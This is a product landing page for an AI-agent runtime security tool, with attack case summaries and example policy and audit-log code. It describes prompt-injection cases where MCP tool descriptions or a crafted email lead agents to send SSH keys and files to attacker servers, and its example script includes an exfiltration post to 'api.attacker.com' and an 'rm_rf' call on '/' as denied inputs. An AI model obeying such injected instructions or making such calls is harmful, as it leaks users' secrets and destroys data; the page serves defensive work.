AI Agent Security

RUNTIME SECURITY FOR AI AGENTS

Your AI agents have access to your infrastructure. Nothing stops them from using it wrong.

>1.5M decisions/sec · <1ms latency overhead · Ring 0 BPF-LSM enforcement
"These are working exploits with immediate, real-world consequences. Attackers silently hijack AI agents to exfiltrate sensitive data and move across enterprise systems, bypassing the human entirely."
Michael Bargury, CTO, Zenity · Black Hat USA 2025

"Prompt injection is unlikely to ever be fully solved."
OpenAI, official statement, December 2025

"Attackers use AI freely. Defenders face red tape."
Rob Lee, Chief AI Officer, SANS Institute · RSAC 2025

"IDPI is no longer merely theoretical but is being actively weaponized. The web itself effectively becomes an LLM prompt delivery mechanism."
Unit 42, Palo Alto Networks Threat Research
"An agent does not have the same human understanding of things that are wrong to do. When given a goal, an agent will do harmful things."
Dean Sysman, Co-founder, Axonius · Bessemer Venture Partners

"The rapid adoption of AI agents has created an attack surface that most organizations do not even know exists. While vendors promise AI safety, attackers are already exploiting these systems in production."
Ben Kilger, CEO, Zenity

"AI agents are autonomous, high-privilege actors that can reason, act, and chain workflows across systems."
Barak Turovsky, Former Chief AI Officer, General Motors · Bessemer Venture Partners

Three attack classes your existing stack cannot see.

Each demonstrated in the wild. Firewalls, WAFs, CASB, and SIEM missed every one.

01 · CVE-2025-59536
Claude Code silently disables its own deny rules
Security checks stop firing when they cost too many tokens. Full RCE and API key theft confirmed via malicious repo files.
Lilith: Kernel hook fires on every connect(). No token budget at Ring 0.

02 · INVARIANT LABS · 2025
Tool descriptions exfiltrate SSH keys and configs
Instructions hidden in MCP tool descriptions directed agents to read and upload private keys to an attacker server. Affected Anthropic, OpenAI, Zapier, Cursor.
Lilith: Taint set on read_file. Outbound POST returns EPERM at the kernel before data leaves. Swapped MCP server refused before first call.

03 · CVE-2025-32711
One email. OneDrive, SharePoint, Teams. No click.
Crafted email caused Copilot to exfiltrate across three Microsoft services. Four controls bypassed. No alert fired.
Lilith: Taint tracks every read. EPERM at kernel before the packet forms, regardless of routing domain.

Firewalls inspect packets. WAFs inspect HTTP headers. EDRs watch process creation. None operate at tool-call granularity. None track data flow across calls. None enforce at the moment connect() fires. The only enforcement point that cannot be bypassed from userspace is the kernel.

Open Source · Apache 2.0 · v0.2.1

Lilith Zero SDK

Taint propagation + policy hooks at the application layer. Ships with pre-exec hooks for Claude Code and GitHub Copilot out of the box. Works with OpenClaw, closing dozens of CVEs still unpatched in production agent systems. No kernel requirements. No infrastructure changes.

>1.5M decisions/sec · <1ms overhead · Apache 2.0 license · CVC5 formal proofs


import asyncio

from lilith_zero import Lilith


async def main():
    # Wrap the MCP server command; every tool call made through lz
    # is checked against policy.yaml before it reaches the server.
    async with Lilith(
        "python mcp_server.py",
        policy="policy.yaml",
    ) as lz:
        result = await lz.call_tool(
            "read_file",
            {"path": "/data/report.txt"},
        )
        print(result)


asyncio.run(main())
Runtime enforcement
✓ read_file("/data/report.txt")    taint: +file_read          0.4ms
✗ http_post("api.attacker.com")    taint: file_read → DENY    0.2ms
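The read_file → http_post sequence shown above, worked through as an added illustration of taint propagation with a per-session bitmask. This is example code written for this page, not Lilith Zero's engine: the tool names, taint labels, rule format, and hostnames are assumptions, and a real deployment would express the rules in the policy file rather than in a Python dict.

```python
"""Illustrative taint-propagation policy check (added example, not Lilith Zero's code).

Models the scenario above: read_file sets a taint bit on the agent session,
and a later http_post to an unknown host is denied because the session
carries that taint. Tool names, taint labels, the rule format and the hosts
are assumptions made for this example.
"""
from dataclasses import dataclass, field

# One bit per taint label in a 64-bit session mask (assumed labels).
TAINT_BITS = {
    "file_read": 1 << 0,
    "env_read": 1 << 1,
    "secret_read": 1 << 2,
    "net_recv": 1 << 3,
}
MASK64 = (1 << 64) - 1


@dataclass(frozen=True)
class ToolRule:
    adds: int = 0                            # taint bits the tool sets on success
    deny_if_tainted: int = 0                 # deny when the session carries any of these
    allowed_hosts: frozenset = frozenset()   # sinks exempt from the taint check


# Assumed policy; a real deployment would load this from the policy file.
POLICY = {
    "read_file": ToolRule(adds=TAINT_BITS["file_read"]),
    "read_env":  ToolRule(adds=TAINT_BITS["env_read"] | TAINT_BITS["secret_read"]),
    "http_get":  ToolRule(adds=TAINT_BITS["net_recv"]),
    "http_post": ToolRule(
        deny_if_tainted=TAINT_BITS["file_read"] | TAINT_BITS["secret_read"],
        allowed_hosts=frozenset({"api.internal.example"}),  # assumed internal sink
    ),
}


@dataclass
class Session:
    taint: int = 0                          # 64-bit bitmask, starts clean
    trace: list = field(default_factory=list)


def taint_names(mask: int) -> list:
    return [name for name, bit in TAINT_BITS.items() if mask & bit]


def decide(session: Session, tool: str, args: dict) -> tuple:
    """Return (verdict, reason). Tools absent from the policy are denied."""
    rule = POLICY.get(tool)
    if rule is None:
        return "DENY", f"{tool}: not in policy"
    host = args.get("host", "")
    carried = session.taint & rule.deny_if_tainted
    if carried and host not in rule.allowed_hosts:
        return "DENY", f"{tool} -> {host}: session tainted by {'+'.join(taint_names(carried))}"
    return "ALLOW", f"{tool}: ok"


def call_tool(session: Session, tool: str, args: dict) -> str:
    """Check the call; on ALLOW, propagate the tool's taint into the session."""
    verdict, reason = decide(session, tool, args)
    if verdict == "ALLOW":
        session.taint = (session.taint | POLICY[tool].adds) & MASK64
    session.trace.append((tool, verdict, reason, taint_names(session.taint)))
    return verdict


def run_scenario() -> list:
    """Replay the sequence from the runtime-enforcement output, plus two extra calls."""
    s = Session()
    call_tool(s, "read_file", {"path": "/data/report.txt"})      # ALLOW, +file_read
    call_tool(s, "http_post", {"host": "api.attacker.com"})       # DENY: tainted session
    call_tool(s, "http_post", {"host": "api.internal.example"})   # ALLOW: exempt sink
    call_tool(s, "rm_rf", {"path": "/"})                          # DENY: unknown tool
    return s.trace


if __name__ == "__main__":
    for tool, verdict, reason, taints in run_scenario():
        print(f"{'✓' if verdict == 'ALLOW' else '✗'} {reason}  taint={taints}")
```

The decision is keyed to data flow rather than destination: the same http_post to api.attacker.com passes on a fresh session and fails once a file has been read, which is what lets a taint engine catch exfiltration that destination filtering alone would miss. The allowed_hosts set only exempts known internal sinks from the taint check; it does not open any destination to untainted traffic that the policy would otherwise block.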
Install Lilith Zero
$ curl -sSfL https://www.badcompany.xyz/lilith-zero/install.sh | sh

As with any curl | sh installer, download the script first and read it before running it.
Products

ONE SECURITY ARCHITECTURE.

Start open source at the application layer. Upgrade to kernel-level enforcement when the threat model demands it. Both run the same Cedar policy language and taint engine.

OPEN SOURCE

Lilith Zero

Application-layer enforcement for MCP agents. No kernel required.

  • Cedar policy engine: policy-as-code, human-readable
  • 64-bit taint bitmask per agent session
  • Python and TypeScript SDKs
  • HMAC-signed tamper-evident audit log
  • Apache 2.0 licensed, full source available
FIPS 140-2 Validated
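The HMAC-signed, tamper-evident audit log listed above, shown as an added example of the hash-chaining pattern such a log relies on. This is illustration code written for this page, not Lilith Zero's implementation; the record fields, JSON layout, and the key handling are assumptions.

```python
"""Illustrative HMAC-chained, tamper-evident audit log.

Added example, not Lilith Zero's implementation. Each entry's tag is an HMAC
over the previous entry's tag plus the entry body, so editing, reordering or
removing an entry invalidates every tag from that point on. Key handling,
record fields and the JSON layout are assumptions made for this example.
"""
import hashlib
import hmac
import json
from typing import Optional

GENESIS_TAG = b"\x00" * 32  # chain anchor for the first entry


def _canonical(body: dict) -> bytes:
    # Sorted keys, no whitespace: the same body always serialises identically.
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def _tag(key: bytes, prev_tag: bytes, body: dict) -> bytes:
    return hmac.new(key, prev_tag + _canonical(body), hashlib.sha256).digest()


def append(log: list, key: bytes, record: dict) -> dict:
    """Append a record; the new tag chains to the previous entry's tag."""
    prev = bytes.fromhex(log[-1]["tag"]) if log else GENESIS_TAG
    body = {"seq": len(log), "record": record}
    entry = dict(body, tag=_tag(key, prev, body).hex())
    log.append(entry)
    return entry


def verify(log: list, key: bytes) -> tuple:
    """Return (ok, first_bad_seq). Checks sequence continuity and every tag."""
    prev = GENESIS_TAG
    for i, entry in enumerate(log):
        if entry.get("seq") != i:
            return False, i
        expected = _tag(key, prev, {"seq": entry["seq"], "record": entry["record"]})
        if not hmac.compare_digest(expected, bytes.fromhex(entry["tag"])):
            return False, i
        prev = expected
    return True, None


def head_tag(log: list) -> str:
    """Tag of the newest entry. Keep a copy out-of-band to detect truncation."""
    return log[-1]["tag"] if log else GENESIS_TAG.hex()


def demo(key: bytes = b"assumed-audit-key") -> dict:
    """Constructed records mirroring the runtime-enforcement output, then three tamper attempts."""
    log: list = []
    for tool, verdict, taint in [
        ("read_file", "ALLOW", "+file_read"),
        ("http_post", "DENY", "file_read"),
        ("read_file", "ALLOW", "+file_read"),
    ]:
        append(log, key, {"tool": tool, "verdict": verdict, "taint": taint})
    committed_head = head_tag(log)  # what an external witness would have recorded

    # 1. Flip the DENY to ALLOW in place: the tag at seq 1 no longer matches.
    edited = json.loads(json.dumps(log))
    edited[1]["record"]["verdict"] = "ALLOW"

    # 2. Remove the DENY entry entirely: seq 2 now sits at position 1.
    deleted = [log[0], log[2]]

    # 3. Drop the tail: the chain still verifies; only the out-of-band head catches it.
    truncated = log[:2]

    return {
        "intact": verify(log, key),
        "edited": verify(edited, key),
        "deleted": verify(deleted, key),
        "truncated_chain": verify(truncated, key),
        "truncated_head_matches": head_tag(truncated) == committed_head,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The third case is the practical caveat: a chained MAC proves nothing was altered or removed from the middle, but it cannot tell a complete log from one whose newest entries were cut off. Anchoring the latest tag somewhere the agent host cannot write (a remote store, a signed heartbeat) is what closes that gap, and the key itself has to live outside the agent's reach or the chain can simply be rebuilt.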
ENTERPRISE

Lilith

Kernel-level enforcement. Zero agent code changes. Zero trust gaps.

  • BPF-LSM at Ring 0, transparent to any agent framework
  • SPIFFE/SPIRE cryptographic workload identity
  • Fail-closed BPF heartbeat: all connections blocked if daemon dies
  • Ed25519-signed policy capsules with anti-rollback watermarks
  • FIPS 140-3 capable (aws-lc-rs crypto backend)
SERVICES

Professional Services

Architecture review, deployment, and ongoing security posture.

  • AI agent attack surface assessment and threat modeling
  • White-box security audit of existing AI agent pipelines
  • Cedar policy authoring and formal verification
  • SPIRE deployment and SPIFFE identity integration
  • Bespoke incident response and remediation planning

OPEN SOURCE RESEARCH

Publishing our findings to secure the future of AI

Red-Teaming Agent

A comprehensive framework for LLM safety through adversarial prompt generation and automated evaluation.

Python

Hack the AI

Red-Teaming game where users hack realistic multimodal agent systems with RAG, memory, and tool usage.

TypeScript, Python, LangChain

CHIMERA

Cryptographic Honeypot & Intent-Mediated Enforcement Response Architecture

Python

Agency Without Assurance

Investigating the security risks of autonomous agents with full computer access and OpenClaw configuration vulnerabilities.

Security Audit

MEET THE TEAM

János Mozer

CEO

Physics background, with experience building fault-tolerant distributed systems that maintain high availability through secure protocols.

Gregorio Jaca

RESEARCHER & ARCHITECT

Physics and Biology background. Worked on simulations from fluid dynamics and rockets to network systems. Currently researching LLM dynamics and interpretability through the lens of chaos theory.

Péter Tallósy

CTO

Physics-trained research engineer with deep expertise in ML/AI and full-stack software engineering. Experience in security and in building directly on hardware.
